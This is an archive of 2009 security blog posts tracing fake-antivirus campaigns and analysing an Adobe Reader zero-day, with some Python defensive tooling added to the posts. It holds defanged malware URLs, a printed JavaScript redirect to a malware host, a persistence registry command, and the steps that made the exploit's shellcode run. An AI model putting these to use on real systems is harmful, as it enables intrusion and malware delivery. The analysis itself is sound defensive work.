Tuesday, December 22, 2009

Malware attacks on Winter Solstice - Shortest day of the year 2009

Yesterday, December 21st 2009 was the Winter Solstice, meaning that it was the shortest day of the year. Malware authors did not miss this opportunity to push their malicious binaries using SEO (search-engine optimization) attacks. My colleague already posted a blog on SEO attacks where he mentioned that an SEO attack takes advantage of Google's PageRank technology to push search results to the top. We found that several phrases/names like “Winter Solstice 2009 celebration” or “Shortest day of the year 2009” used as search queries returned a page redirecting to malicious sites containing malware. Here is a screenshot of the search results:


Looking at the screenshot, you will find that the 3rd and 5th search results are malicious. Attackers use SEO because users are more likely to click on links which show up as top results. Clicking on the 3rd link redirects the victim to a malicious site hosting malware. Here is what a user will see:


Redirection could take the victim to a variety of sites, all of which are hosting fake security applications. The malicious sites use fake images, popups or even videos to social engineer the victim into downloading a malicious executable once they click on the page. Here are a few of the sites used for downloading the malware:

“hxxp://ftorm.com/scn/579876515334ef7a1587…[truncated]”

“hxxp://shjow.com/scn/3fe14f17847082bd940b…[truncated]”

“hxxp://prizepcscan.com/?p=p52dcWpsal%2FCj…[truncated]”

“hxxp://newscanonline.info/downloads.php/?aff_id=384…[truncated]”

Here are screenshots of the malicious sites:


The above images were taken after clicking on the same search results multiple times, resulting in redirection to different attack sites and different methods used for infection. Sometimes the victim will be presented with a video playing or popup images or messages urging the victim to install fake anti-virus software. The sites displaying videos download a file named “Flash_Plugin_Setup1261476530.exe” to the system, and other sites download “setup.exe” as the malicious file. Here are the VirusTotal results for those files:

For “Flash_Plugin_Setup1261476530.exe”

http://www.virustotal.com/analisis/78f7246e0e6b9ae58bba1581727f2f598d330cfaf34c987f1bed665ee53429cb-1261476806

For “setup.exe”

http://www.virustotal.com/analisis/2f86f7bc9139dc4267ad1325c92f08557f5a359e6d74ccb6620248b99cf9a68e-1261476933

The “setup.exe” has very poor detection (4 out of 41). This is not the first time malware authors have used the latest hot news, celebrities’ names, holidays, popular events etc. They use such key phrases to push their malicious site to the top of the search results using SEO techniques. They continually change their malicious binaries in order to evade anti-virus detection. The success of this approach is demonstrated in the above VirusTotal results illustrating poor AV detection. Be sure to never download anything from a redirected site promising free security software.

Be Safe,

Umesh

Monday, December 21, 2009

Beware of SEO attacks

On Sunday, Tom Stuker, a United Global Services member who flew about 700,000 miles this year, was interviewed on Fox News. Not long after that, the top Google search results for Tom Stuker were all poisoned to have links that take the victim to Fake AV malware downloads.

SEO (search-engine optimization) attacks take advantage of Google's PageRank technology to have their page result bubble to the top. Google's PageRank technology is based on a web of trust: pages that are linked to are ranked as being of higher importance and thus scored higher. However, using clever hypertext content for their page and an army of bots to spread links on forums, blogs, hacked websites, etc., hackers are able to grab the top spots for their search terms of choice.

Given the speed at which these search terms are poisoned, it is likely that the hackers have bots monitoring popular media feeds for names / key-phrases that folks are likely to Google. This type of leveraging of the media as a decision-based feed for automation reminds me of the fictional book Daemon. Other members in the security industry have recently taken notice of these rapid SEO attacks as well: Brittany Murphy SEO and Beware of bad Google search results.

Following the redirects to get to the malware for one of the Tom Stuker examples seen yesterday:

hxxp://davtech.org/sqr.php?in=tom%20stuker
302s to: hxxp://hirm9k.xorg.pl?in.php?t=cc&d=20-12-2009_some2&h=davtech.org&p=http%3A%2F%www.google.com [snip...]
302s to: hxxp://newvirusscan.com/hitin.php?land=20&affid=92400
302s to: hxxp://newvirusscan.com/index.php?affid=92400

A few JavaScript files load, then the payload:
hxxp://newvirusscan.com/downloader.php?affid=92400
200 response: Content-Disposition: attachment; filename="install.exe"

Interesting stuff in the 200 OK response from the server:
Pragma: hack

Uploaded sample to VirusTotal (first one seen for this sample) - poor detection (13/41): http://www.virustotal.com/analisis/af58ed98fdc57ed25eb59d7e21b28f9f270bae6a5a8ca789f97876641567800f-1261348933



Saturday, December 19, 2009

Going Green? The Cloud can help...

In light of the U.N. Climate Conference in Copenhagen, Denmark this week, and the agreement "to set a mitigation target to limit warming to no more than 2 degrees Celsius" I thought it would be fitting to do a quick post on the energy-saving benefits of cloud computing ... whether you are doing it to save the polar bears or to save some cash, these benefits should be recognized and considered by many organizations.

Do a Google search for cloud computing energy saving and you get about 195,000 results. This does not come as a surprise, because as one of the results states, cloud computing is "an inherently energy-efficient technology." No shock here: the amount of computing power that most organizations have is well beyond what is actually being used by their employees ... and as Moore's Law indicates, this computing power will double every two years. Many of the servers in your organization's server racks are not doing anything terribly complex: handling DNS lookups, processing email, filtering traffic, and storing data. Most organizations have a separate server for each function and may have redundant / fail-over servers as well.

This website calculates the electricity cost of running a desktop computer to be $405/year (330 Watt power supply and $0.14/kWh). A Dell PowerEdge 2970 has a 750 Watt power supply with an option for a redundant power supply for fail-over. Running this server has an electricity cost of $907/year per power supply. HowStuffWorks details how much electricity coal generates (roughly 2,460 kWh/ton). Running the example server with one power supply for a year uses 6,480 kWh, requiring 2.6 tons of coal.

Cloud computing companies often lease space in data-centers, which charge a premium for power, cooling, and rack-space (see Datacenter energy costs outpacing hardware prices). In order for companies that offer services in the cloud to remain competitive, they must be efficient with their computing power: consolidation, virtualization, efficient software, "smart" power management, etc. So adopting cloud computing is a good thing: it saves electricity/money/coal/pollution/polar bears/planet and funds the innovation of efficient computing.

Friday, December 18, 2009

1 Week 'til XMAS... Avoid Shopping Woes

Many folks are familiar with fake goods sites (e.g., replica watches and fake pharm / pill sites). These sites either peddle shoddy goods, or just flat out steal your payment credentials.

In case you needed to be reminded this holiday season, there are more than the obvious scam sites out there. Many show up in search engine results / advertisements and forum / e-mail advertisements (spam). On top of which, many have been in business for more than this holiday season.

Some examples,
hxxp://www.cheap-abercrombie.com/
hxxp://www.variantkicks.com/
hxxp://www.tiffanyoutlet.com/

You can see by visiting the sites, that their virtual store-fronts look legit:


The name records for each of these examples date back to 2001, 2007, and 2008:

There are many more examples of these questionable virtual storefronts. However, I was able to find a single spam forum post advertising the above examples (which is why I selected these three):

This site states that cheap-abercrombie.com advertises that their merchandise is authentic, but customers are reporting the merchandise to be poorly made replicas with no option for return / refund.

This site states that variantkicks.com sells counterfeit shoes and charges $36 USD for returns.

The tiffanyoutlet.com site does not currently resolve to an A record (but is also not showing that it is suspended by the Registrar). Google has a cached page of the site here, and Google results show that the site has been advertised via spam and is peddling fake jewelry.

Whether you are buying your sweetie a tennis bracelet, a sweater, or some new kicks this holiday season, buy from reputable stores, do your research, and if you have any doubt about the legitimacy of a store, err on the side of caution and shop elsewhere. Onguardonline.gov has more advice for online shopping here.

Don't watch-familyguyonline.com

... or at least be careful if you do.
Who doesn't like a good episode of Family Guy? Well, even if you don't, that isn't the point of this post. There are dangers in visiting and trusting sites that link to and embed external content without validating that content first. Malware advertisers have been leveraging pop culture content and stories to entice and social engineer their victims into downloading their malware; Michael Jackson's death themed malware is a prime example. This morning I came across some malicious redirector sites that look very much like (and may be) legit sites. Nonetheless, when a visitor follows the embedded video link to view their favorite episodes of Family Guy or another show, they would receive an annoying dose of survey pages (i.e., sign me up for spam) and/or malware.

Here's a snippet of such sites for Family Guy:
watch-familyguyonline.com
www.watch-family-guy-online.com
www.watch-familyguy-online.com
watchfamilyguyonline.org

What appears to have happened here is that sites like these automatically embed links to megavideo.com or other external video sources that are tagged as being Family Guy (or other specific) episodes without validating them.

Following the redirects, I tracked these two examples to the following malware:
hxxp://watch-familyguyonline.com/testt/
hxxp://www.watch-family-guy-online.com/season-8/episode-9-business-guy/

These load megavideo.com content, which eventually takes the following path:
  1. Megaclick.com, e.g., hxxp://s.megaclick.com/ad.code?de=9e09c529-07435895-c974b103-73e05fb5-bd3a-4-a48c&tm=1261149695.21963&du=aHR0cDovL3d3dy55ZXpsaW5rLmNvbS9zdGF0cy5waHA%2fcD1tZWdhY2xpY2tnenVz%0a&api_var_rd_mode=popunder_html
  2. Yezlink.com, e.g., hxxp://www.yezlink.com/stats.php?p=megaclickgzus
  3. 302 redirect to hxxp://www.gameztar.com/go.php?a=1839&l=112
  4. 302 redirect to hxxp://www.gameztar.com/startDownload.do?a=1839&l=112
  5. Download: hxxp://download.gameztar.com/toolbar/gameztar/download/avatar/2.1.102.r6380/000011_oSz/gameztar_installer.exe

The MD5 of the sample is: c5b8e34abfb067ddc5f294cb057f86a0
With VirusTotal results (9/41): http://www.virustotal.com/analisis/a4b092a2b60a07aa6127314e5fbf37642272ad725569ed008df108fe43fd524b-1261147802
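The two chains above (the Tom Stuker 302 sequence ending in a Content-Disposition download, and the Family Guy popunder sequence) are both worth tracing hop by hop rather than letting a client auto-follow them, because the intermediate hosts are what you block and search proxy logs for. The following is an added example, not code from the original posts: it models the Tom Stuker chain with a constructed, in-memory response map (hxxp replaced by http, the hirm9k.xorg.pl URL shortened) so it runs offline, and the `fetch` callable is a stand-in for any HTTP client with redirects disabled. It also flags the two response traits the post called out: an `.exe` attachment and the odd `Pragma: hack` header.

```python
"""Follow an HTTP redirect chain one hop at a time and flag the final response."""
import re
from typing import Callable, Dict, List, Tuple
from urllib.parse import urljoin, urlsplit

Response = Tuple[int, Dict[str, str]]          # (status, lower-cased headers)
Fetcher = Callable[[str], Response]

# Constructed sample chain modelled on the hops quoted in the post; not captured traffic.
SAMPLE_CHAIN: Dict[str, Response] = {
    "http://davtech.org/sqr.php?in=tom%20stuker":
        (302, {"location": "http://hirm9k.xorg.pl/in.php?t=cc&h=davtech.org"}),
    "http://hirm9k.xorg.pl/in.php?t=cc&h=davtech.org":
        (302, {"location": "http://newvirusscan.com/hitin.php?land=20&affid=92400"}),
    "http://newvirusscan.com/hitin.php?land=20&affid=92400":
        (302, {"location": "/index.php?affid=92400"}),          # relative Location
    "http://newvirusscan.com/index.php?affid=92400":
        (200, {"content-type": "text/html"}),
    "http://newvirusscan.com/downloader.php?affid=92400":
        (200, {"content-disposition": 'attachment; filename="install.exe"',
               "pragma": "hack"}),
}

def sample_fetch(url: str) -> Response:
    """Offline stand-in for a single GET with redirects disabled."""
    return SAMPLE_CHAIN.get(url, (404, {}))

REDIRECT_CODES = (301, 302, 303, 307, 308)

def trace_chain(fetch: Fetcher, url: str, max_hops: int = 10) -> List[Tuple[str, int]]:
    """Return [(url, status), ...] for each hop until a non-redirect, a loop, or the cap."""
    hops, seen = [], set()
    while len(hops) < max_hops:
        status, headers = fetch(url)
        hops.append((url, status))
        if status not in REDIRECT_CODES or "location" not in headers:
            break
        seen.add(url)
        url = urljoin(url, headers["location"])   # resolves relative Locations
        if url in seen:
            break                                  # redirect loop
    return hops

def hosts_in_chain(hops: List[Tuple[str, int]]) -> List[str]:
    """Hostname of each hop: the list a blocklist or proxy-log search would key on."""
    return [urlsplit(u).hostname for u, _ in hops]

def indicators(headers: Dict[str, str]) -> List[str]:
    """Response traits worth alerting on: an .exe attachment, a non-standard Pragma."""
    flags = []
    cd = headers.get("content-disposition", "")
    m = re.search(r'filename="?([^";]+)"?', cd, re.I)
    if "attachment" in cd.lower() and m and m.group(1).lower().endswith(".exe"):
        flags.append("exe-attachment")
    pragma = headers.get("pragma")
    if pragma and pragma.lower() != "no-cache":
        flags.append("nonstandard-pragma:" + pragma)
    return flags

if __name__ == "__main__":
    chain = trace_chain(sample_fetch, "http://davtech.org/sqr.php?in=tom%20stuker")
    for u, s in chain:
        print(s, u)
    print(indicators(sample_fetch("http://newvirusscan.com/downloader.php?affid=92400")[1]))
```

To run it against a live URL, replace `sample_fetch` with a function that issues one request with redirects turned off and returns the status and lower-cased headers; the loop guard and hop cap matter there, since these affiliate redirectors sometimes bounce between the same two hosts.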

Update:
While writing this post, it appears that the first video has already been removed by megavideo (for infringement violation).


Wednesday, December 16, 2009

New Zero day Adobe Acrobat Reader vulnerability analysis – Part 2

Earlier, in the first blog of this series, we talked about a malicious PDF file and extracted the malicious script. Now we have the malicious script in readable format and want to know if it successfully runs or not. I am not going to run the original malicious file for now. I will replace the original shellcode with a simple one which will open “calc.exe” after successful exploitation. The problem is that the original malicious PDF file is in encoded format, so we can’t edit the malicious script inside the file. For that I will create a new test PDF file using the “make-pdf-javascript.py” tool from PDF Tools. This tool creates a simple PDF file containing JavaScript which displays a message box once opened. I am going to add the malicious JavaScript code inside this file using the command:

D:\make-pdf-javascript.py --javascriptfile=Malicious_Script.js test.pdf

I am going to use another shellcode which will open “calc.exe”. Here is the newly created PDF file:

Let’s open it and see if this exploit works. This time it only crashed and did not open “calc.exe”. But I got a chance to look into the debugger. Here is the state of the OllyDbg debugger:

EDX currently holds zero and the code is trying to CALL DWORD PTR [EDX+4]. Since EDX is zero, this raises an access violation exception. Further, we found that the module is “C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api”. Let’s change the EDX value manually in the debugger to see if this is going to work or not. Since we have already filled the heap, we need to change the value accordingly. I found our NOP sled and shellcode get loaded at address “0A0A0A0A”, so this is the value we are going to use. Here is the state of OllyDbg once I modify the values:

Now EDX points to address “0x0A0A0A0A” and [EDX + 4] contains the address “0x0A0A0A20”, which is our NOP sled. So once I press “F9” (run) in OllyDbg, it will jump to address “0A0A0A20” and execute everything from there on. You can see this step by step during debugging. Yes, it has executed the NOP sled and our shellcode, and “calc.exe” opened on the machine. But this was done by changing the values manually. It looks like there is a memory corruption problem. I played a little bit with the code and found that we have to add one more call to the vulnerable function before the try{} block. Here is how the new modified code will look:

Once I run this file again, the shellcode executed successfully: it showed the classic pop-up box with an error message and opened “calc.exe”:

From the above, it is clear that there is a memory-free issue with the vulnerable method “util.printd()”. It required calling this method twice, with the try{} block. The code then executes successfully and opens a calculator. This means that if we now remove the “calc.exe” shellcode and use the original shellcode, it is going to execute in the background without any notice. I am not going into more details of the original shellcode this time due to the length of the blog post.

That is it for this series.

Umesh

New Zero day Adobe Acrobat Reader vulnerability analysis – Part 1

On December 14th, Symantec and Shadowserver reported a new zero day vulnerability in the wild affecting Adobe Reader. This is now identified as CVE-2009-4324. Adobe acknowledged the same on their website, saying they are investigating this issue. And as usual, it is not the first time that PDFs are being targeted for exploitation. Earlier we saw that Flash files were being targeted, taking advantage of a known vulnerability in the wild. This time it is an Adobe zero day vulnerability being exploited in the wild. A colleague provided me with a sample PDF file exploiting this vulnerability in the wild. I started looking into it in depth. The PDF file was obfuscated and not in a readable format. I used my favorite “pdf-parser.py” from PDF Tools. I ran the malicious PDF file through this parser and saved the output for every element of the PDF file to a text file. Here is how it looks:

The output file was very big and I wanted to find the malicious script code inside it. As I said earlier, the file was obfuscated and contains a lot of objects/elements inside. I was only interested in some strings like JavaScript, FlateDecode, etc. I tried to search for these blocks inside the output file and found some of interest:

The above screenshots show some of the interesting blocks which were used to uncover the malicious code inside. The “pdf-parser.py” tool has some very good options to parse certain objects inside the file. I looked at the documentation of the tool and some of the options looked valuable to me. Here are some options and documentation copied directly from the PDF Tools site.

“Filter option applies the filter(s) to the stream. For the moment, only FlateDecode is supported (e.g. zlib decompression). The raw option makes pdf-parser output raw data (e.g. not the printable Python representation). Objects outputs the data of the indirect object which ID was specified. This ID is not version dependent. If more than one object have the same ID (disregarding the version), all these objects will be outputted.”

This is what we need for running against suspicious blocks or objects inside the PDF file. I then ran a command against the object with ID 110, using a command like:

D:\>pdf-parser.py --object=110 --raw --filter malicious-file.pdf > output.log

The command ran successfully and I was interested to see if we got any interesting data in the output file. I opened the file and found very suspicious and obfuscated JavaScript code:

From here it was easy to work. I opened the Malzilla (malware hunting) tool and copied the above script into the decoder section of the tool. I pressed the ‘Run Script’ button and found another script, but this one was in readable format. Here is how it looked:

Let’s copy this and put it in a text file so that we can see the whole script. This is a screenshot of the full script used in the PDF file:

If you look at the strings and code above, it is clearly heap spray code and this code relates to Adobe Reader. It checks the version of the application and only exploits the vulnerability if the viewer version is greater than 8. This indicates that it is targeting the latest Adobe Reader. There is also one JavaScript function called “util.printd()” inside a try{}-catch{} block, and this looks like the culprit. According to Adobe's documentation, this function returns a date using a specified format. If you look at the parameters passed to this function, they are invalid and contain @ and some long numbers. This is likely the vulnerable method causing memory corruption in Adobe Reader.
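The workflow in Part 1 (dump objects, pick the one carrying JavaScript, inflate its FlateDecode stream, read the script) and the indicators Part 2 relies on (the viewer-version check, the `unescape()`'d `%u` sled, the `util.printd()` call in a try block) can be automated for triage. The following is an added example, not the pdf-parser.py or make-pdf-javascript.py tools from the posts: a minimal stand-alone scanner that does for every object what the posts did by hand with `--object`, `--raw` and `--filter`, then greps the inflated result. The sample PDF is constructed inline, the indicator list is an assumption (a starting point, not a complete signature), and the embedded script is inert placeholder text that only contains the names being searched for.

```python
"""Minimal PDF object scanner: find JavaScript, inflate FlateDecode streams, grep indicators."""
import re
import zlib
from typing import Dict, List

# Assumption: a starting list of strings from the analysis above, not a complete signature.
INDICATORS = [b"/JavaScript", b"/JS", b"util.printd", b"app.viewerVersion",
              b"unescape(", b"%u0a0a", b"%u0c0c"]

# Constructed, inert script: it only contains the names the scanner looks for.
SAMPLE_SCRIPT = (b"var v = app.viewerVersion;\n"
                 b"var sled = unescape('%u0a0a%u0a0a');\n"
                 b"try { util.printd('CONSTRUCTED_PLACEHOLDER', new Date()); } catch (e) {}\n")

def build_sample_pdf(script: bytes) -> bytes:
    """Construct a tiny PDF whose OpenAction runs a FlateDecode-compressed script."""
    compressed = zlib.compress(script)
    objs = [
        b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj",
        b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj",
        b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj",
        b"4 0 obj << /S /JavaScript /JS 5 0 R >> endobj",
        b"5 0 obj << /Length %d /Filter /FlateDecode >>\nstream\n" % len(compressed)
        + compressed + b"\nendstream\nendobj",
    ]
    return b"%PDF-1.4\n" + b"\n".join(objs) + b"\ntrailer << /Root 1 0 R >>\n%%EOF\n"

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj(.*?)endobj", re.S)
LENGTH_RE = re.compile(rb"/Length\s+(\d+)(?!\s+\d+\s+R)")   # ignore indirect /Length refs

def iter_objects(pdf: bytes):
    """Yield (object id, body) for every indirect object in the file."""
    for m in OBJ_RE.finditer(pdf):
        yield int(m.group(1)), m.group(3)

def raw_stream(body: bytes) -> bytes:
    """Stream bytes of an object body, inflated when the filter is FlateDecode."""
    start = re.search(rb"stream\r?\n", body)
    if not start:
        return b""
    begin = start.end()
    length = LENGTH_RE.search(body)
    if length:                                   # trust a direct /Length, as readers do
        data = body[begin:begin + int(length.group(1))]
    else:                                        # otherwise fall back to the keyword
        end = body.find(b"endstream", begin)
        data = body[begin:end if end != -1 else None]
    if re.search(rb"/Filter\s*/FlateDecode", body):
        try:
            data = zlib.decompress(data)
        except zlib.error:
            return b""                           # truncated or deliberately damaged stream
    return data

def scan_pdf(pdf: bytes) -> Dict[int, List[str]]:
    """Object id -> indicators found in its dictionary or its inflated stream."""
    report: Dict[int, List[str]] = {}
    for oid, body in iter_objects(pdf):
        haystack = body + raw_stream(body)
        hits = [ind.decode() for ind in INDICATORS if ind in haystack]
        if hits:
            report[oid] = hits
    return report

if __name__ == "__main__":
    for oid, hits in scan_pdf(build_sample_pdf(SAMPLE_SCRIPT)).items():
        print(oid, hits)
```

On a real sample, object ids, object streams (/ObjStm) and filters other than FlateDecode will need handling that pdf-parser.py already has; the value of the scanner is that it points you at the object to hand to `--object`/`--filter` rather than reading the whole dump.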

This is the first blog in the series and I will provide more information in the second blog of this series. The second blog will cover whether the exploit is successful or not and how it can be leveraged further. I mentioned earlier in the Flash blog series as well that new zero day vulnerabilities continue to be discovered in the wild affecting popular applications like Adobe. The solution for now is to disable JavaScript within Acrobat Reader, as described by the Shadowserver team, since Adobe does not have a patch yet.

That’s it for now. Happy hunting!!!

Umesh

Tuesday, December 15, 2009

2010 Security Predictions

2009 was the year that we learned the meaning of the word recession and looked to the cloud for answers. Budgets were slashed and security departments were forced to do more with less, all while cybercrime rates rose as frustrated individuals used whatever means necessary to earn in a difficult economic climate. What 2010 will bring remains unclear but as we approach the New Year, optimism is beginning to emerge.

On the technology front, the ‘cloud honeymoon’ is over and now the hard work begins. Mobile is as exciting as ever with new platforms and functionality emerging with vendors battling for dominance. Social networking winners have been established, but we’re just beginning to see their true potential. Much remains to be seen but one thing is for sure – attackers are following these trends just as closely as the enterprises and consumers that benefit from them. That which becomes popular today, will be the attack vector of choice tomorrow. Below are our security predictions for the New Year.

1.) Apple is forced to climb the security learning curve

Apple has for some time been considered to have a safer operating system in OS X as it is less often targeted by attackers. While that may be true, it is less secure overall and Apple's increasing market share will force them to finally invest in security due to increasing attacks targeted at Apple devices.

2.) App Store Party Crashers

App stores are all the rage, with every mobile vendor racing to replicate Apple's success. Generally, vendors stand guard and only let in the applications that they feel are appropriate. Consumers mistakenly believe that this ensures that only secure applications can be obtained but that is not the case. Security testing is limited at best with app developers already having success slipping in apps with undocumented APIs. Attackers will take things one step further and slip malicious apps in under the gatekeeper's watch.

3.) Web based worms go prime time

We've been teased with a variety of web based worms from Samy to StalkDaily. Most have been experiments as opposed to planned attacks with the goal of financial gain. That's about to change.

4.) The emergence of the web platform

We've gone from web sites to web applications and we're now seeing the birth of the web platform. Social Networking sites such as Facebook have gone beyond delivering dynamic applications welcoming user-supplied content. They have now evolved into platforms inviting user-supplied functionality, allowing virtually anyone to develop unique applications within their ecosystem. Attackers will take advantage of this to deploy malicious applications on social networks and the sites will struggle to identify and block them before deployment.

5.) Attackers turn to the cloud

The cloud offers unprecedented storage and processing power at an attractive price. Think that's only attractive to enterprises? Think again.

6.) The arrival of financial DDoS attacks

Cloud based services generally charge based on actual consumption. This provides attackers with incentive to hold enterprises hostage by artificially inflating costs. Unfortunately, cloud providers have little incentive to stop this practice.

7.) Poking holes in the cloud

My greatest hope for 2010 is that marketing departments will give the term 'cloud computing' a well-deserved break. 2009 saw great interest in the development of cloud computing architectures and one must wonder how often security was sacrificed in order to get to market quickly. Expect attackers to devote time to poking holes in the APIs of cloud providers. When they're found, thanks to multi-tenant architectures, it will have been worth the effort.

8.) Clickjacking comes out of hibernation

Clickjacking roared onto the scene in the summer of 2008 when Jeremiah Grossman and Robert Hansen had their OWASP talk delayed at the request of Adobe. The sensational web cam/microphone hack that drew media attention has been addressed, but the overall flaw still remains. Clickjacking can be a valuable tool in a social engineering attack and we’ve just begun to see it leveraged in attacks.

9.) Browser vendors finally start to take XSS seriously

I was very encouraged when Microsoft released IE 8 this year and it included cross-site scripting (XSS) protection. For all of the heat that Microsoft takes for security vulnerabilities, they continue to be a leader when it comes to adding innovative security features and this was another example. I’m confident that other browser vendors have taken notice and will fall in line.

10.) Past Data Breaches will look like child's play

This is by far the easiest prediction to make. We’ve all been amazed by the staggering numbers of compromised accounts in the CardSystems, Heartland and TJX data breaches, but prepare to be blown away once again. After all, records were made to be broken. As memory becomes cheaper and power becomes more expensive, enterprises are looking to consolidate data storage and continue to build massive data centers and develop ever larger data stores thanks to cloud computing. The volume of data that can be stolen when adequate security controls are not implemented will be truly staggering.

Monday, December 14, 2009

Case Study: Fake Codec Leveraging LastFM


The Fake Codec / Fake Anti-Virus malware campaign, historically led by the Russian Business Network (RBN), has been going on for some time (here's a blog post dating back to 2006). Dancho Danchev's blog often details this campaign as well. While the campaign hasn't changed that drastically from its inception, I thought I'd provide an overview of a case seen this morning to highlight its current state.

This morning's case used a LastFM user profile to advertise a Britney Spears sex tape:
hxxp://www.last.fm/user/BritneySpears33

LastFM is not the only victim of having malware campaigns advertised through their social networking interface (other examples where Fake Codec / AV malware has been advertised include other popular social sites: LinkedIn, Hi5, Digg, Scribd, and yes Facebook).

Here are a few more examples of these advertisements seen in LastFM (be careful if you follow these links): example 1, example 2, and example 3.

The Shoutbox portion provides a link to kick-off the "fun-filled" viewing for the unsuspecting victim ...

The link directs the would-be victim to: hxxp://bigtubeforyou.com/mirolim-video/5.html
which presents the browser with the obfuscated Javascript:

which decodes to:
var1=71;var2=var1;
if(var1==var2) document.location="hxxp://evamendesochka.com/go.php?sid=<num>";

The "sid" parameter allows the client to cycle through a round-robin of 302 redirects to Fake Codec / AV malware sites including:

hxxp://showmelovetube.cn/tube.htm
hxxp://door-ringer.cn/?pid=116&sid=299a9c
hxxp://tinytubetv.com/xplaymovie.php?id=45233

With malware downloads to:

hxxp://tubefreewatch.cn/1/install_plugin.exe
hxxp://windows-antivirus2.com/download/Inst_116.exe
hxxp://clearcristalmedia.com/flash-HQ-plugin.45233.exe

Some of the A records for the above used domains:
bigtubeforyou.com. 3600 IN A 66.36.248.253
evamendesochka.com. 2123 IN A 66.36.231.29
showmelovetube.cn. 2145 IN A 66.36.248.253
tubefreewatch.cn. 3600 IN A 66.36.248.253

NS records for the above used domains include:
ns1.kimmusha.com. 172513 IN A 66.36.231.29
ns1.evamendesochka.com. 172800 IN A 66.36.231.29

Taking a look at the 66.36.0.0/19 rwhois for this hopone.net block shows that the two IP addresses used in this campaign are specifically SWIPed out for the "sls-db4p12" network name, "svservers" organization:


The sls-db4p12 network name identifies the IPs as being part of superb.net network. The organization, svservers has been identified (again, dating back to 2006) in the past involved in supporting spamming / hacking operations. SvServers is a Russian dedicated hosting service:
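The pivot above (several campaign domains and their name servers resolving into the same two addresses of one hosting block) is the kind of check worth scripting, since, as the post notes, the domains rotate faster than the infrastructure. The following is an added example, not from the original post: it parses zone-style A records (a constructed copy of the ones listed above, plus one unrelated record), groups domains by address, and computes the smallest prefix that contains every campaign address. For the two addresses in the post that prefix works out to 66.36.224.0/19, which the example then uses as its block; the `cluster_report` function and its defaults are assumptions of this example.

```python
"""Pivot on shared hosting: group domains by resolved address and derive the common block."""
import ipaddress
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed sample: the records quoted in the post plus one unrelated record.
RECORDS = """\
bigtubeforyou.com. 3600 IN A 66.36.248.253
evamendesochka.com. 2123 IN A 66.36.231.29
showmelovetube.cn. 2145 IN A 66.36.248.253
tubefreewatch.cn. 3600 IN A 66.36.248.253
ns1.kimmusha.com. 172513 IN A 66.36.231.29
ns1.evamendesochka.com. 172800 IN A 66.36.231.29
example.invalid. 300 IN A 192.0.2.10
"""

def parse_a_records(text: str) -> List[Tuple[str, str]]:
    """(owner name without trailing dot, address) for every 'name ttl IN A addr' line."""
    out = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[2] == "IN" and parts[3] == "A":
            out.append((parts[0].rstrip("."), parts[4]))
    return out

def group_by_address(records: List[Tuple[str, str]]) -> Dict[str, List[str]]:
    """address -> names resolving to it, in first-seen order."""
    groups: Dict[str, List[str]] = defaultdict(list)
    for name, addr in records:
        groups[addr].append(name)
    return dict(groups)

def smallest_common_block(addrs: List[str]) -> str:
    """Smallest CIDR prefix containing every address (a hosting-block hypothesis to verify in whois)."""
    nets = [ipaddress.ip_network(a) for a in addrs]      # each address as a /32
    block = nets[0]
    while not all(n.subnet_of(block) for n in nets):
        block = block.supernet()                          # widen by one bit at a time
    return str(block)

def cluster_report(text: str, block: str = "66.36.224.0/19") -> Dict[str, List[str]]:
    """Addresses inside `block` that host more than one of the names, with those names."""
    net = ipaddress.ip_network(block)
    return {addr: names
            for addr, names in group_by_address(parse_a_records(text)).items()
            if ipaddress.ip_address(addr) in net and len(names) > 1}

if __name__ == "__main__":
    print(smallest_common_block(["66.36.248.253", "66.36.231.29"]))
    for addr, names in cluster_report(RECORDS).items():
        print(addr, names)
```

The block derived this way is only a hypothesis: confirm it against the registry's whois/rwhois (as the post did) before treating the whole prefix as one owner, since a common prefix can also straddle two unrelated allocations.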


These redirect / malware domains will be updated by the malware provider as they are discovered and blocked (e.g., by Google / browser alerts). One out of the above three was in my browser's alerts at the time of writing this up. Fortunately for reputation-based schemes, such as Zscaler's Page Risk Indexing, these IPs and certainly the SvServers infrastructure will be in use a bit longer by the malware provider.

The malware samples have very poor detection:

Inst_116.exe
MD5: c0d2017be29e5383b1a680ef59ed22e0
VirusTotal (5/41): http://www.virustotal.com/analisis/d1a052f117f1e0e4f828c04b7cabd8428cde6b9fc11f61e6e2f3d63ec01f9152-1260842320

flash-HQ-plugin.45233.exe
MD5: 2d683959e8864707f8f9808c404cd315
VirusTotal (8/41): http://www.virustotal.com/analisis/439d13cdefff86ed15051920114d10d2b190d08c1620245b15c6e56f1c8958e1-1260844620

and the most interesting for last:

install_plugin.exe
MD5: cbc1760ac498065235fea17f35eb254b
VirusTotal (0/41): http://www.virustotal.com/analisis/387b9195ab821bdc32c8e2523e1137de67305100b992df0d4393198adae292ae-1260817839

F-Prot identified the binary as being packed by NSIS. NSIS is the Nullsoft Scriptable Install System, which states the following capabilities:

The latest release was recent: NSIS 2.46 on December 6, 2009.

7-Zip advertises on its homepage that it is able to unpack NSIS. Running the file through 7-Zip, the following file was extracted from the NSIS installer:
cryptwm97.dll
MD5: 2a823c8d471c5b7ee394e8bd2d0087f4
VirusTotal (0/41): http://www.virustotal.com/analisis/327939a7910aa4747302c66ba6f4b6f8eea8cd08a4e3065682a711149c3f318e-1260820248

The DLL is 73728 bytes and imports and leverages functionality from the Windows DLLs:
gdi32.dll, kernel32.dll, ole32.dll, shell32.dll, shlwapi.dll, user32.dll

And exports the functions:
DllInit and DllInstall

Running the install_plugin.exe through a sandbox, a file with the same MD5 as cryptwm97.dll was created on the infected system at the location:

%AppData%\atmsyssound\atmsyssound.dll

Here, %AppData% is a variable that refers to the file system directory that serves as a common repository for application-specific data. A typical path is C:\Documents and Settings\[UserName]\Application Data.

The malware also modified the registry key:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
with value
atmsyssound = "rundll32.exe "%AppData%\atmsyssound\atmsyssound.dll", DllInit"
so that atmsyssound.dll runs its initialization function DllInit every time Windows starts.
